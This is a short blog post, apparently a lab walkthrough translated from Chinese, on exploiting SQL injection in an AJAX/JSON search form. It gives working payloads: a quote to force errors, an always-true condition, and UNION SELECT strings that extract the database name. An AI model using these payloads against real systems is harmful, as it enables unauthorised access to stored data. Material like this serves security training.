当前位置:网站首页>SQL Injection (AJAX/JSON/jQuery)

SQL Injection (AJAX/JSON/jQuery)

2022-07-03 13:45:00 this is hhhhp

1.AJAX/JSON/jQuery

(1)AJAX

Through a small amount of data exchange with the server in the background ,AJAX Asynchronous update of web pages . This means that you can load the entire page without reloading it , Update a part of the web page in real time .

(2)JSON

JSON (JavaScript Object Notation) Is a lightweight data exchange format .

Is a data format .

(3)jQuery

jQuery It's a JavaScript library , Use jQuery Not only will it take a lot of JavaScript Code to achieve the function reduced to a few lines of code , It also provides enough high-speed performance , It's a skill that every website developer should master .

2. Inject

Let's grab a bag first :

Enter... In the input box i 

  Bag caught :

first line ,title=i, Change to ' have a look :

sql Wrong report , guess sql The statement is as follows :

select * from Table name where Title like '%". User input ."%'

So it can be constructed like this sql sentence :

select * from Table name where Title like '%"' or '"%

The inquiry is correct , All the movies are

 

  On this basis, inject :

0' union select 1,2,3,4,5,6,7 '

obtain 2,3,4,5, altogether 4 Displayable bits

  Blast storage :

0' union select 1,database(),3,4,5,6,7 '

 

  Just behind GET/Search About the same .

原网站

版权声明
本文为[this is hhhhp]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202150520252584.html

边栏推荐

猜你喜欢

随机推荐